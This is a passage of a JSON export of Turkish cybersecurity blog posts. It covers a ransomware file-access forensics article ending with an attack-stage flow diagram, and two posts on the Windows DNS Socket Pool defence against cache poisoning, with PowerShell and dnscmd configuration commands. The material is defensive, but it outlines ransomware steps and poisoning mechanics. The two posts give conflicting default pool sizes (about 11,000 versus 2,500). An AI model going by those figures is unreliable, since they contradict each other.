i&ccedil;ermelidir:<\/p>\n<ol>\n<li>\n<p><strong>&Ouml;zet<\/strong><\/p>\n<\/li>\n<li>\n<p><strong>Sald\u0131r\u0131 Zaman &Ccedil;izelgesi<\/strong><\/p>\n<\/li>\n<li>\n<p><strong>Bula\u015fma Y&ouml;ntemi<\/strong><\/p>\n<\/li>\n<li>\n<p><strong>Etkilenen Dosya Say\u0131s\u0131<\/strong><\/p>\n<\/li>\n<li>\n<p><strong>Etkilenen Kullan\u0131c\u0131lar<\/strong><\/p>\n<\/li>\n<li>\n<p><strong>Veri S\u0131z\u0131nt\u0131s\u0131 Bulgular\u0131<\/strong><\/p>\n<\/li>\n<li>\n<p><strong>\u0130yile\u015ftirme &Ouml;nerileri<\/strong><\/p>\n<\/li>\n<li>\n<p><strong>Gelecek Sald\u0131r\u0131lara Kar\u015f\u0131 &Ouml;nlem Seti<\/strong><\/p>\n<\/li>\n<\/ol>\n<hr>\n<h1><strong>9. &Ouml;rnek Ransomware \u015eifreleme Ak\u0131\u015f Diyagram\u0131<\/strong><\/h1>\n<pre><code>[Initial Access]\n      &darr;\n[Payload Execution]\n      &darr;\n[Privilege Escalation]\n      &darr;\n[Shadow Copy Deletion]\n      &darr;\n[Mass File Enumeration]\n      &darr;\n[File Read &rarr; Encrypt &rarr; Write]\n      &darr;\n[File Rename (extension append)]\n      &darr;\n[Ransom Note Deployment]\n      &darr;\n[Optional: Data Exfiltration]\n<\/code><\/pre>\n<hr>\n<p>Bu whitepaper, ransomware sald\u0131r\u0131lar\u0131nda&nbsp;<strong>dosya eri\u015fim analizi<\/strong> i&ccedil;in profesyonel seviyede bir metodoloji sunmaktad\u0131r. MFT, USN Journal, Sysmon, SRUM ve EDR telemetry gibi birden fazla artefakt\u0131n korelasyonu sald\u0131r\u0131n\u0131n:<\/p>\n<ul>\n<li>\n<p>Etki alan\u0131n\u0131n,<\/p>\n<\/li>\n<li>\n<p>Zincirinin,<\/p>\n<\/li>\n<li>\n<p>Kullan\u0131lan ara&ccedil;lar\u0131n,<\/p>\n<\/li>\n<li>\n<p>Sald\u0131rgan davran\u0131\u015f paterni,<\/p>\n<\/li>\n<li>\n<p>Veri kayb\u0131 seviyesinin<\/p>\n<\/li>\n<\/ul>\n<p>tam olarak anla\u015f\u0131lmas\u0131n\u0131 sa\u011flar.<\/p>\n<p>Bu analiz, olaya m&uuml;dahale ekiplerinin hem teknik hem de reg&uuml;lasyon uyumlu bir m&uuml;dahale yapabilmesi i&ccedil;in kritik &ouml;nemdedir.<\/p>\n<hr>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>","excerpt":"Ransomware sald\u0131r\u0131lar\u0131 g\u00fcn\u00fcm\u00fczde kurumlar\u0131n kar\u015f\u0131la\u015ft\u0131\u011f\u0131 en kritik tehditlerin ba\u015f\u0131nda geliyor. Modern fidye yaz\u0131l\u0131mlar\u0131 yaln\u0131zca verileri \u015fifrelemekle kalm\u0131yor; ayn\u0131 zamanda dosya sisteminde ola\u011fan d\u0131\u015f\u0131 bir aktivite b\u0131rakarak izlerini de saklamaya \u00e7al\u0131\u015f\u0131yor.","created_at":"2025-12-03 18:32:07","updated_at":"2026-09-23 16:37:03","category_id":7,"view_count":604,"reading_time":12,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2025-12-03 15:32:00","featured_image":"db630c443d86206b0661160a894eb1d5.png","slug":"ransomware-incelemelerinde-dosya-erisim-analizi-nasil-yapilir","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":356,"title":"DNS in Gizli Koruyucusu","content":"<p><iframe style=\"width: 670px; height: 377px;\" src=\"https:\/\/www.youtube.com\/embed\/GzP0ZzhiA98\" width=\"670\" height=\"377\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p><img src=\"https:\/\/www.imperva.com\/learn\/wp-content\/uploads\/sites\/13\/2024\/07\/DNS-Poisoning.png?utm_source=chatgpt.com\" alt=\"Image\" width=\"658\" height=\"416\"><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h1>Windows DNS G&uuml;venli\u011finin Sessiz Kahraman\u0131: Socket Pool (Yuva Havuzu)<\/h1>\n<p>Kurumsal a\u011flarda <strong>DNS sunucular\u0131<\/strong>, &ccedil;o\u011fu zaman &ldquo;her zaman &ccedil;al\u0131\u015fan ama pek dokunulmayan&rdquo; kritik bile\u015fenlerdir. Ancak bu sessizlik, onlar\u0131 ayn\u0131 zamanda <strong>hedef h&acirc;line<\/strong> getirir. Windows DNS altyap\u0131s\u0131nda g&uuml;venli\u011fi ciddi \u015fekilde art\u0131ran ama pek bilinmeyen mekanizmalardan biri de <strong>Socket Pool (Yuva Havuzu)<\/strong> &ouml;zelli\u011fidir.<\/p>\n<p>Bu yaz\u0131da Socket Pool&rsquo;un ne oldu\u011funu, neden hayati &ouml;neme sahip oldu\u011funu ve yanl\u0131\u015f yap\u0131land\u0131r\u0131ld\u0131\u011f\u0131nda nas\u0131l b&uuml;y&uuml;k riskler do\u011furabilece\u011fini <strong>insani, sade ama teknik do\u011frulu\u011fu y&uuml;ksek<\/strong> bir dille ele alaca\u011f\u0131z.<\/p>\n<hr>\n<h2>DNS&rsquo;te As\u0131l Sorun Nereden Ba\u015flad\u0131?<\/h2>\n<p>Klasik DNS &ccedil;al\u0131\u015fma mant\u0131\u011f\u0131nda sunucu, <strong>&ouml;zyinelemeli (recursive)<\/strong> sorgular\u0131 g&ouml;nderirken <strong>sabit bir kaynak portu<\/strong> kullan\u0131yordu.<br>Bu durum, sald\u0131rganlar i&ccedil;in ciddi bir avantaj sa\u011fl\u0131yordu:<\/p>\n<ul>\n<li>\n<p>Kaynak port sabit<\/p>\n<\/li>\n<li>\n<p>Geriye yaln\u0131zca <strong>Transaction ID (TXID)<\/strong> tahmini kal\u0131yor<\/p>\n<\/li>\n<li>\n<p>Yeterince deneme yap\u0131l\u0131rsa <strong>sahte DNS yan\u0131t\u0131 enjekte edilebiliyor<\/strong><\/p>\n<\/li>\n<\/ul>\n<p>Bu sald\u0131r\u0131 t&uuml;r&uuml;, <strong>DNS Cache Poisoning (&Ouml;nbellek Zehirlenmesi)<\/strong> olarak bilinir ve etkisi olduk&ccedil;a y\u0131k\u0131c\u0131d\u0131r:<\/p>\n<ul>\n<li>\n<p>Kullan\u0131c\u0131lar fark etmeden sahte sitelere y&ouml;nlendirilir<\/p>\n<\/li>\n<li>\n<p>Kimlik bilgileri &ccedil;al\u0131nabilir<\/p>\n<\/li>\n<li>\n<p>Zararl\u0131 yaz\u0131l\u0131mlar me\u015fru alan adlar\u0131 &uuml;zerinden yay\u0131labilir<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h2>Socket Pool Nedir ve Ne \u0130\u015fe Yarar?<\/h2>\n<p><strong>Socket Pool<\/strong>, Windows DNS Sunucusu&rsquo;nun bu zay\u0131fl\u0131\u011f\u0131n\u0131 ortadan kald\u0131rmak i&ccedil;in geli\u015ftirilmi\u015f bir g&uuml;venlik mekanizmas\u0131d\u0131r.<\/p>\n<p>Temel mant\u0131\u011f\u0131 \u015fudur:<\/p>\n<blockquote>\n<p>DNS sunucusu, her recursive sorgu i&ccedil;in <strong>rastgele se&ccedil;ilmi\u015f bir kaynak portu<\/strong> kullan\u0131r.<\/p>\n<\/blockquote>\n<p>B&ouml;ylece sald\u0131rgan\u0131n ba\u015far\u0131l\u0131 olabilmesi i&ccedil;in art\u0131k iki \u015feyi <strong>ayn\u0131 anda do\u011fru tahmin etmesi gerekir<\/strong>:<\/p>\n<ul>\n<li>\n<p>Do\u011fru <strong>TXID<\/strong><\/p>\n<\/li>\n<li>\n<p>Do\u011fru <strong>kaynak port<\/strong><\/p>\n<\/li>\n<\/ul>\n<p>Bu kombinasyonun tutturulma ihtimali <strong>milyonda bir seviyesine<\/strong> d&uuml;\u015fer.<br>Pratikte bu, sald\u0131r\u0131n\u0131n <strong>ekonomik ve teknik olarak anlams\u0131z h&acirc;le gelmesi<\/strong> demektir.<\/p>\n<p><img src=\"https:\/\/media.geeksforgeeks.org\/wp-content\/uploads\/DNS_Spoofing.png?utm_source=chatgpt.com\" alt=\"Image\" width=\"629\" height=\"353\"><\/p>\n<hr>\n<h2>G&uuml;venlik Etkisi: K&uuml;&ccedil;&uuml;k De\u011fi\u015fiklik, B&uuml;y&uuml;k Sonu&ccedil;<\/h2>\n<p>Socket Pool aktifken:<\/p>\n<ul>\n<li>\n<p>DNS cevaplar\u0131 rastgele portlardan beklenir<\/p>\n<\/li>\n<li>\n<p>Sahte yan\u0131tlar b&uuml;y&uuml;k oranda bo\u015fa d&uuml;\u015fer<\/p>\n<\/li>\n<li>\n<p>DNS &ouml;nbelle\u011fi zehirlenmesi neredeyse imk&acirc;ns\u0131z h&acirc;le gelir<\/p>\n<\/li>\n<\/ul>\n<p>&Uuml;stelik bu koruma:<\/p>\n<ul>\n<li>\n<p>Arka planda &ccedil;al\u0131\u015f\u0131r<\/p>\n<\/li>\n<li>\n<p>Kullan\u0131c\u0131y\u0131 etkilemez<\/p>\n<\/li>\n<li>\n<p>Performans kayb\u0131 yaratmaz<\/p>\n<\/li>\n<\/ul>\n<p>Yani tam anlam\u0131yla <strong>sessiz ama kritik<\/strong> bir g&uuml;venlik katman\u0131d\u0131r.<\/p>\n<hr>\n<h2>Socket Pool Boyutu Neden &Ouml;nemli?<\/h2>\n<p>Socket Pool&rsquo;un etkinli\u011fi, <strong>SocketPoolSize<\/strong> de\u011feriyle do\u011frudan ili\u015fkilidir.<\/p>\n<ul>\n<li>\n<p>B&uuml;y&uuml;k havuz &rarr; Daha fazla rastgelelik &rarr; Daha y&uuml;ksek g&uuml;venlik<\/p>\n<\/li>\n<li>\n<p>K&uuml;&ccedil;&uuml;k havuz &rarr; Tahmin edilebilirlik artar<\/p>\n<\/li>\n<\/ul>\n<p><strong>Kritik Uyar\u0131:<\/strong><\/p>\n<pre><code class=\"language-text\">SocketPoolSize = 0\n<\/code><\/pre>\n<p>Bu ayar, Socket Pool mekanizmas\u0131n\u0131 <strong>tamamen devre d\u0131\u015f\u0131 b\u0131rak\u0131r<\/strong>.<\/p>\n<p>Sonu&ccedil;:<\/p>\n<ul>\n<li>\n<p>DNS tekrar sabit portlara d&ouml;ner<\/p>\n<\/li>\n<li>\n<p>Cache Poisoning sald\u0131r\u0131lar\u0131na kap\u0131 ard\u0131na kadar a&ccedil;\u0131l\u0131r<\/p>\n<\/li>\n<\/ul>\n<p>Ne yaz\u0131k ki bu ayar, performans veya &ldquo;sorun giderme&rdquo; gerek&ccedil;esiyle baz\u0131 sistemlerde bilin&ccedil;sizce yap\u0131labiliyor.<\/p>\n<hr>\n<h2>PowerShell ile Socket Pool Y&ouml;netimi<\/h2>\n<p>Sistem y&ouml;neticileri, Socket Pool yap\u0131land\u0131rmas\u0131n\u0131 PowerShell &uuml;zerinden kontrol edebilir ve y&ouml;netebilir.<br>Bu da denetimi <strong>&ouml;l&ccedil;&uuml;lebilir ve raporlanabilir<\/strong> h&acirc;le getirir.<\/p>\n<p>&Ouml;zellikle b&uuml;y&uuml;k kurumsal ortamlarda:<\/p>\n<ul>\n<li>\n<p>DNS g&uuml;venli\u011fi &ldquo;varsay\u0131lanlara b\u0131rak\u0131lmamal\u0131&rdquo;<\/p>\n<\/li>\n<li>\n<p>Yap\u0131land\u0131rmalar d&uuml;zenli olarak g&ouml;zden ge&ccedil;irilmelidir<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h2>Socket Pool T&uuml;kenme Korumas\u0131 (Exhaustion Protection)<\/h2>\n<p>Kaynakta ayr\u0131ca &ouml;nemli bir ba\u015fka katman daha vurgulan\u0131r:<br><strong>Socket Pool T&uuml;kenme Korumas\u0131<\/strong><\/p>\n<p>Bu &ouml;zellik:<\/p>\n<ul>\n<li>\n<p>A\u015f\u0131r\u0131 say\u0131da sorgu ile havuzun t&uuml;ketilmesini engeller<\/p>\n<\/li>\n<li>\n<p>DNS sunucusunun kaynak yorgunlu\u011funa girmesini &ouml;nler<\/p>\n<\/li>\n<li>\n<p>Hizmet d\u0131\u015f\u0131 b\u0131rakma (DoS) benzeri senaryolara kar\u015f\u0131 ek dayan\u0131kl\u0131l\u0131k sa\u011flar<\/p>\n<\/li>\n<\/ul>\n<p>Yani Socket Pool sadece <strong>do\u011fruluk<\/strong> de\u011fil, <strong>s&uuml;reklilik<\/strong> de sa\u011flar.<\/p>\n<hr>\n<h2>Sonu&ccedil;: G&ouml;r&uuml;nmeyen Ama Hayati Bir Savunma Katman\u0131<\/h2>\n<p>Socket Pool bize \u015funu hat\u0131rlat\u0131r:<\/p>\n<blockquote>\n<p><strong>En iyi g&uuml;venlik &ouml;nlemleri, fark edilmeden &ccedil;al\u0131\u015fanlard\u0131r.<\/strong><\/p>\n<\/blockquote>\n<p>Ne kullan\u0131c\u0131 g&ouml;r&uuml;r,<br>ne uygulama fark eder,<br>ama sald\u0131rgan i&ccedil;in tablo tamamen de\u011fi\u015fir.<\/p>\n<p>Windows DNS altyap\u0131s\u0131nda:<\/p>\n<ul>\n<li>\n<p>Socket Pool&rsquo;un kapal\u0131 olmas\u0131 b&uuml;y&uuml;k bir risktir<\/p>\n<\/li>\n<li>\n<p>Yanl\u0131\u015f yap\u0131land\u0131r\u0131lmas\u0131 sessiz bir a&ccedil;\u0131k olu\u015fturur<\/p>\n<\/li>\n<li>\n<p>Do\u011fru kullan\u0131m\u0131 ise modern tehditlere kar\u015f\u0131 g&uuml;&ccedil;l&uuml; bir kalkand\u0131r<\/p>\n<\/li>\n<\/ul>\n<p>DNS g&uuml;venli\u011fi &ldquo;&ccedil;al\u0131\u015f\u0131yor mu?&rdquo; sorusundan ibaret de\u011fildir.<br>As\u0131l soru \u015fudur:<\/p>\n<blockquote>\n<p><strong>&ldquo;Do\u011fru ve g&uuml;venli \u015fekilde mi &ccedil;al\u0131\u015f\u0131yor?&rdquo;<\/strong><\/p>\n<\/blockquote>\n<p>Socket Pool, bu soruya verilen en g&uuml;&ccedil;l&uuml; cevaplardan biridir.<\/p>\n<p>detyal\u0131 yaz\u0131ya buradan ula\u015fabilirsiniz.<\/p>\n<p><a href=\"..\/..\/..\/windows-dns-serverin-socket-pool-udp-kaynak-port-havuzu-davranisi\" target=\"_blank\" rel=\"noopener\">https:\/\/ondernet.net\/windows-dns-serverin-socket-pool-udp-kaynak-port-havuzu-davranisi<\/a><\/p>\n<p>&nbsp;<\/p>","excerpt":"","created_at":"2025-11-28 12:49:19","updated_at":"2026-09-07 13:56:41","category_id":7,"view_count":495,"reading_time":5,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2025-11-28 09:49:00","featured_image":"788b3d69968f1a092551757e80fa96a6.png","slug":"dns-in-gizli-koruyucusu","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":352,"title":"Windows DNS Server\u2019\u0131n socket pool (UDP kaynak port havuzu) davran\u0131\u015f\u0131","content":"<h3>Windows DNS Sunucusu&rsquo;nun Gizli Kahraman\u0131: Socket Pool ile Cache Saturation Sald\u0131r\u0131lar\u0131na Kar\u015f\u0131 Koymak<\/h3>\r\n<p><iframe src=\"https:\/\/www.youtube.com\/embed\/GzP0ZzhiA98\" width=\"560\" height=\"314\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\r\n<p>Bir g&uuml;venlik duvar\u0131n\u0131n g&uuml;nl&uuml;klerinde veya a\u011f izleme ara&ccedil;lar\u0131n\u0131zda hi&ccedil;, Windows DNS Sunucunuzdan &ccedil;\u0131kan, s&uuml;rekli de\u011fi\u015fen kaynak port numaral\u0131 DNS sorgular\u0131 g&ouml;rd&uuml;n&uuml;z m&uuml;? Bu, rastgele bir davran\u0131\u015f de\u011fil; bu, Microsoft'un **\"Socket Pool\"** (Yuva Havuzu) ad\u0131 verilen ak\u0131ll\u0131 ve proaktif bir g&uuml;venlik mekanizmas\u0131n\u0131n i\u015f ba\u015f\u0131ndaki i\u015faretidir.<\/p>\r\n<p>Peki nedir bu Socket Pool, ne i\u015fe yarar ve neden &ouml;nemsemelisiniz? Gelin, DNS g&uuml;venli\u011finin bu &ouml;nemli bile\u015fenini birlikte inceleyelim.<\/p>\r\n<p>Temel Problem: DNS &Ouml;nbellek Zehirlenmesi (Cache Poisoning)<\/p>\r\n<p>Sorunu anlamak i&ccedil;in &ouml;nce tehdidi tan\u0131yal\u0131m. Klasik bir DNS Cache Poisoning (&ouml;nbellek zehirlenmesi) sald\u0131r\u0131s\u0131nda, bir sald\u0131rgan hedef DNS sunucusuna, *\"google.com'un IP adresi 1.2.3.4't&uuml;r\"* gibi sahte bir cevap g&ouml;ndermeye &ccedil;al\u0131\u015f\u0131r.<\/p>\r\n<p>DNS, UDP &uuml;zerinde &ccedil;al\u0131\u015fan istemci-istemci olmayan (stateless) bir protokold&uuml;r. Sunucu bir sorgu g&ouml;nderdi\u011finde, gelen cevab\u0131n hangi sorguya ait oldu\u011funu anlamak i&ccedil;in &uuml;&ccedil; bilgiye bakar:<br>1.&nbsp; Hedef IP Adresi** (Sunucunun kendi IP'si)<br>2.&nbsp; Hedef Port** (Genellikle standart 53)<br>3.&nbsp; DNS Sorgu Kimli\u011fi (Transaction ID - TXID)** - 16 bitlik rastgele bir say\u0131<\/p>\r\n<p>Sald\u0131rgan, sunucunun g&ouml;nderdi\u011fi sorguyu g&ouml;r&uuml;rse (veya tahmin ederse), kaynak IP'si ve portunu taklit ederek (*spoofing*), do\u011fru TXID'ye sahip sahte bir cevap g&ouml;nderebilir. E\u011fer bu sahte cevap, ger&ccedil;ek cevaptan &ouml;nce sunucuya ula\u015f\u0131rsa, sunucu zehirlenmi\u015f veriyi &ouml;nbelle\u011fine al\u0131r ve sonraki t&uuml;m kullan\u0131c\u0131lar\u0131 yanl\u0131\u015f (ve genellikle k&ouml;t&uuml; ama&ccedil;l\u0131) bir siteye y&ouml;nlendirir.<\/p>\r\n<p>Buradaki zay\u0131f nokta, **kaynak portunun sabit olmas\u0131yd\u0131.** Geleneksel olarak DNS sunucular\u0131, recursive sorgular\u0131n\u0131 her zaman 53. kaynak portundan g&ouml;nderirdi. Bu, sald\u0131rgan\u0131n tahmin etmesi gereken de\u011fi\u015fkenleri sadece TXID (65.536 olas\u0131l\u0131k) ile s\u0131n\u0131rl\u0131yordu.<\/p>\r\n<p>&Ccedil;&ouml;z&uuml;m: Socket Pool (Yuva Havuzu) Devreye Giriyor<\/p>\r\n<p>Microsoft, bu g&uuml;venlik a&ccedil;\u0131\u011f\u0131n\u0131 kapatmak i&ccedil;in Windows Server 2008 R2 ve sonras\u0131nda **Socket Pool** &ouml;zelli\u011fini getirdi. Mant\u0131\u011f\u0131 basit ama etkilidir:<\/p>\r\n<p>DNS Sunucusu, recursive sorgular\u0131n\u0131 g&ouml;nderirken art\u0131k sabit bir kaynak portu (53) kullanmak yerine, &ouml;nceden ayr\u0131lm\u0131\u015f rastgele bir port havuzundan dinamik olarak bir port se&ccedil;er.<\/p>\r\n<p>Bu nas\u0131l &ccedil;al\u0131\u015f\u0131r?<br>1. &nbsp;DNS Sunucusu hizmeti ba\u015flad\u0131\u011f\u0131nda, i\u015fletim sistemi taraf\u0131ndan belirlenen bir aral\u0131ktan (varsay\u0131lan olarak 49152-65535) binlerce rastgele kaynak portu \"rezerve eder\". Buna **Socket Pool** denir.<br>2. &nbsp;Sunucu her yeni bir recursive sorgu g&ouml;nderdi\u011finde, bu havuzdan rastgele bir kaynak portu se&ccedil;er ve sorguyu o port &uuml;zerinden g&ouml;nderir.<br>3. &nbsp;Gelen cevab\u0131n, do\u011fru hedef IP, do\u011fru hedef port **ve** do\u011fru kaynak porta gelmesi gerekir.<\/p>\r\n<p>Bu Neden Bu Kadar Etkili?<\/p>\r\n<p>Socket Pool'&uuml;n g&uuml;c&uuml;, sald\u0131rgan\u0131n ba\u015far\u0131 \u015fans\u0131n\u0131 katlanarak d&uuml;\u015f&uuml;rmesinden gelir. Art\u0131k sald\u0131rgan\u0131n sadece TXID'yi de\u011fil, ayn\u0131 zamanda **kullan\u0131lan rastgele kaynak portu** da tahmin etmesi gerekir.<\/p>\r\n<ul>\r\n<li>Tahmin Edilmesi Gereken Olas\u0131l\u0131k Uzay\u0131:\r\n<ul>\r\n<li>DNS Sorgu Kimli\u011fi (TXID): 16 bit = **65.536** olas\u0131l\u0131k<\/li>\r\n<li>Socket Pool Portu: Havuz boyutuna ba\u011fl\u0131. Varsay\u0131lan olarak ~**11.000** port (&ouml;rne\u011fin, 2500 ile 30000 aras\u0131 havuz boyutlar\u0131 yayg\u0131nd\u0131r).<\/li>\r\n<\/ul>\r\n<\/li>\r\n<li>Toplam Olas\u0131l\u0131k:** 65.536 (TXID) x 11.000 (Port) = **720 milyondan fazla** olas\u0131 kombinasyon!<\/li>\r\n<\/ul>\r\n<p>Bu, sald\u0131rgan\u0131n ba\u015far\u0131 \u015fans\u0131n\u0131 astronomik seviyelerde d&uuml;\u015f&uuml;rerek, sald\u0131r\u0131y\u0131 pratikte uygulanamaz hale getirir.<\/p>\r\n<h3>Socket Pool Yap\u0131land\u0131rmas\u0131 ve Y&ouml;netimi<\/h3>\r\n<p>DNS 2016'n\u0131n Nas\u0131l Da\u011f\u0131t\u0131l\u0131r ve Yap\u0131land\u0131r\u0131l\u0131r'\u0131n\u0131n son iki b&ouml;l&uuml;m&uuml;nde, geli\u015fmi\u015f DNS se&ccedil;enekleri ve g&uuml;venli\u011fi ile devam edece\u011fiz.<\/p>\r\n<p>Bu b&ouml;l&uuml;m neleri kapsar<\/p>\r\n<ul>\r\n<li>DNS Soket Havuzu ve DNS Sunucu &Ouml;nbellek Kilitlemesini Yap\u0131land\u0131r\u0131n<\/li>\r\n<li>DNS Kayd\u0131n\u0131 Yap\u0131land\u0131rma<\/li>\r\n<li>Yan\u0131t H\u0131z\u0131 S\u0131n\u0131rland\u0131rmas\u0131<\/li>\r\n<li>Se&ccedil;ici &Ouml;zyineleme ve DNS Sorgu Filtreleme<\/li>\r\n<li>DNS Performans Ayar\u0131<\/li>\r\n<\/ul>\r\n<p>Socket Pool, Windows DNS Sunucusu'nda varsay\u0131lan olarak etkindir ve &ccedil;o\u011fu durumda herhangi bir m&uuml;dahaleye gerek kalmaz. Ancak, g&uuml;venlik gereksinimlerinize g&ouml;re ince ayar yapabilirsiniz.<\/p>\r\n<p>Havuz Boyutunu G&ouml;r&uuml;nt&uuml;leme ve De\u011fi\u015ftirme:<br>&nbsp; &nbsp; Havuz boyutu, `MaxUserPort` ve `TcpTimedWaitDelay` gibi sistem kay\u0131t defteri (`HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters`) ayarlar\u0131 taraf\u0131ndan dolayl\u0131 olarak belirlenir. DNS Sunucusu, bu aral\u0131ktan rastgele portlar se&ccedil;er.<\/p>\r\n<p>&nbsp; &nbsp; Ancak, DNS Server hizmetinin kendine &ouml;zg&uuml; bir yap\u0131land\u0131rmas\u0131 da vard\u0131r. PowerShell kullanarak mevcut Socket Pool boyutunu g&ouml;rebilir ve de\u011fi\u015ftirebilirsiniz:<\/p>\r\n<p>&nbsp; &nbsp;&nbsp;<\/p>\r\n<p>Varsay\u0131lan olarak, socketpoolsize 2500'd&uuml;r ve&nbsp;<strong>bunu dnscmd \/info \/socketpoolsize<\/strong> komutuyla kontrol edebiliriz<\/p>\r\n<pre class=\"language-markup\"><code>Mevcut Socket Pool durumunu g&ouml;r&uuml;nt&uuml;leme\r\nGet-DnsServerSocketPool\r\nSocket Pool boyutunu 3000 olarak ayarlama\r\nSet-DnsServerSocketPool -SocketPoolSize 3000<\/code><\/pre>\r\n<p>Varsay\u0131lan olarak, socketpoolsize 2500'd&uuml;r ve&nbsp;<strong>bunu dnscmd \/info \/socketpoolsize<\/strong> komutuyla kontrol edebiliriz<\/p>\r\n<p><img src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAkUAAABqCAIAAAA9ebJcAAAQAElEQVR4AexdCYAUxdV+r6p7ZvZmWRZYLmERUBQVFBSNBjXGeERjJFGMJt4Gc6hoYqKiISg5Rc2fxBOMifFEEw1eSVCM94UKgtzIuVzL3rsz011V\/1fds7Ozy4LgjXb5uvrVq1evXn+7W99U9bIK3v3bu5C4e5y8i0oI8qeefJhGVEcIRAhECHz+EBC0SxXfl7uohDB\/WslrJUIJ04jqCIEIgQiBzx8Cuxifff6+AJ\/ME4VkhvqTma5tlkiLEIgQiBD4pBD4TPCZOW7C8hmnf1KP3Mk8xox+ZNbkG4zppG+7JmNOf3XOjY8c9z4DT735xro5HyT+diffqU5kGErHUcGz3\/HqFejt2PWRt3dqrsC5DVv7TTJnh\/IMPRvfvhNS9+G+r\/CFW37z6A+Pg7lict2sCafu\/DfYh586jBB8o94BQCA7iInNeQe+t8P4UR0h8FlAYJt8lvsDYH8GWn8ag1Um84ORa+\/0YbAcwCeU7fwU8WNTH6EDtmaFG2bckV1N7CL14damTjMMjcwvnTCLTrzl4LCZW3+tef3ylY\/ppQ90KmbZCQcU9\/r6TQ922ps13nNUr6LiIRctex+3rP9OKRtXPPKPqheu2TIfMn3jq0+vnR3KqY2r2h6EiUKhXadceeywxfef+Bjytjnjm6RyxLmjpmSa1rSN68azhtIr0wr3PQtSMvbubXi9vxk\/AhMGr7ri+y++v+tH6hH+iL36kX7CYL571IhzAci5L9btYLI8ZWLJiIuz+O\/gqE\/YLZouQiAXgW3yWeDUOOuKM\/EzULDPrEWlQydcaW03PnTOsMWZxQJdJUdOvY87X2JAZrce2HD7PjaC9dzuynLxnauGnXWGneDTuq57fN7gY7feov150xv9vaZPK6kdmbebSp3YtBZkBjmz\/r0xLRtDmb7htR0Z\/tn0wZr+6JH0yM5zCQZWltLm1R8BCY275QCadf22vr0\/m7hFWUUIfJER2D6fZZFZVlVD3fp2sn3JenRQsJ2aciDNnnjVJZ2xHXqXz7kjd8eGT9+dbtE6hEUTn5pfnZPZIOYe4mEhe2RWqz3YyQWeNz5yHI4ErT07HQ5Swi0j6qyx0y0aYrZM+Akm3RXlL8X9t5N2+CUAAvVPH1sR+OFhAeCrV+DoNYAruyPHaXAW8FYjRgTwWk8EqQtOU7GffvXmCeFXFp9mYA83GVvPheHvI3Zz9nj4zZP9etXlHH8Fs3f84iKBprnnH9lNDj3lL5gdkknAnie3pprzCNvJAfGxOZt6XcYlfBwEhLSdGWwjbPZ54bz1MWMYKkwM0ZEz3CChJ3pzHyH7yHBbfvPp+AJZzxwc4A8LJOuJmFnEYM9OBPvW0mmqOTHbDskBSPbnDmEh2cjIDU1I+AhbzxJZIgQ+GQR2jM+OHz2stHHeTPuZ9+I7F9CB5+B7N\/tT3S7RbGPf0jJqWD4z235\/ZQe3aPjUPGT5bGz4ICUjJmaWPDP60afPqZh1DowF+9w2u3RM6w9b4ZjJQ14Yfk7BFfOqgxSwaj96ZMWC+zvbNXa2RZucnP+eWxAM\/axUeNPlJ\/L14MENe5TfVzh88cU\/fKV06KSue40vH7\/osceaH5vx4sljhvY75sLy\/beVsQVhQuZQrnhqTbfSNschY0+hqee025GflfEEttntOFa3194c0y17rNf6hRgymK4YPntR5ZgpdD+OtvAZaDtztc3aXrNDjmzbnOHgC1PblNq7EeV8cSvtefUlY8\/FV3\/WZpX9+obnk7mHCtNrht760BkdI23VxrdZdnOGh51wIIVnFcikcvxLoXunYcEQKyYP3TzDfivCOYtYOARLP5CBPUwMzRM3ZU47kNiUWw6+b\/zFuY+Qe+JXduAB+NJg7PTlhWMmXIq3ceCtWwevOjc4Aime0TBm8rU4YLAJjKXwXATf9t3G3rT1SX6YDOp2Z7OtZy3IAbNgbPgjAzdI9sQSXfjKqs3zQrLf+hHgHEmEwKeCwPb5rPDIKfZzbv3kfvMmXhSepGMjVRkcxF9Bp4DVWmlj55IPg3R4twHjjmzR7p25qrpyTMepjwfj0tDgU3n48RYraZBTY7hHRPDK4MAT+7B7FzfCM9xSBD6ZCl3hWzSc1z2+7n94bWaWXXLPTQ9+1s4bcbzrJJvFsqVTN3ZPmI3rbn2gJbn5yy2b6uSbe150V8GPV1dPffSVd6a1W8UwJpTwWS1cVZnTvJkvzasJrbZeNCP8QtsduW0TXTynqvvB5+d+\/Lf2K4cModYItp25Fs26\/l6r5nRtey7r2OmVsznrtL\/VmPni0syNm1tNW9\/BRodUZj6NoRePQ5VDsO5D35ZgSO7mDEv5C8vtz0Lu\/gM+nYYdd3y\/spoF4VrfIf64h6YdMuecLB0GEQjY4psZct4gWVY+sMOQ3Gb1K5m3ifYRSksPJLpxREX14pcyJ6LXLVpEFYdcSTaB5YvCz3lkv7iFw47f5skKQiGBjl\/c3Fm30rF7w3uE6UfYk9idfYStgkWGCIGPEoHt81nm\/Vnuh8Ts5PgQh49pQ460nxOzxjbl7Zrq4KerzbID2va2aHbDZ0NYZhphP4ZXHTmt\/c9hJlt8foRkVw07pv2FzOFQPLHmxDen5a5Q1ivYot1TPe9rzes\/azRm08u9lL5my\/xvNK0F+4aS+8JMypIxk7f3wTw30vb1cHtUPPz1iskAvO0AavujPnBvh81ZhzifTDN3cxbOiJ2f\/Z6ZVXrH3L9kz6jDrh2sZbdhOOTY+udlwf1nInIoHT7hbS9yTc0r2+ve0b6d\/eJmyGx4u\/cIH\/ARdjTHyC9CYEcR2D6fdYyCteaRm9t+sf7A8kKq2Zj5eNjeF6zzyHIaso2zDhyJhG9Z2g8iOyrnFx3x4bHswGPDj9L4KLpozt\/gf+px9vensZc68chzcfBSsS9sFH4OHbMDv1GCRzg1+PV6zDVg+OxFwefcIIStEBZbtPh37BS2HVyecIL7+1SmpOg9p6C+V790t\/z3iitU1y5Nwq0VMUjSjb\/P4I